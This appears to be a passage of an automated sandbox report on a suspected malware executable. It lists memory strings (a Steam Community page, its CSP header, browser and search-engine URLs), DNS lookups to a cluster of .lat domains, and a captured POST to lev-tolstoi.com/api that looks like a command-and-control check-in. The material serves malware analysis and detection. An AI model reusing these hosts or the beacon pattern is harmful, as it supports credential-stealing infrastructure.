                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.0000000000A09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=16219b16eba2e1d25c63a86f; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 
05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 23 Dec 2024 06:18:43 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://play equals www.youtube.com (Youtube)
                Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-srFc equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
                Source: global trafficDNS traffic detected: DNS query: necklacebudi.lat
                Source: global trafficDNS traffic detected: DNS query: energyaffai.lat
                Source: global trafficDNS traffic detected: DNS query: aspecteirs.lat
                Source: global trafficDNS traffic detected: DNS query: sustainskelet.lat
                Source: global trafficDNS traffic detected: DNS query: crosshuaht.lat
                Source: global trafficDNS traffic detected: DNS query: rapeflowwj.lat
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:27060
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
                Source: 0gnHF2twcT.exe, 00000000.00000003.1602485832.0000000005284000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
                Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.steampowered.com/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009B4000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aspecteirs.lat:443/api
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                Source: 0gnHF2twcT.exe, 00000000.00000003.1604274344.0000000005270000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: 0gnHF2twcT.exe, 00000000.00000003.1556707560.0000000005213000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556645122.0000000005216000.00000004.00000800.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1556801053.0000000005213000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowered.com/
                Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661793794.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1626344596.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1661858835.0000000000A34000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://checkout.steampowvc
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009AD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529843564.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508211861.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
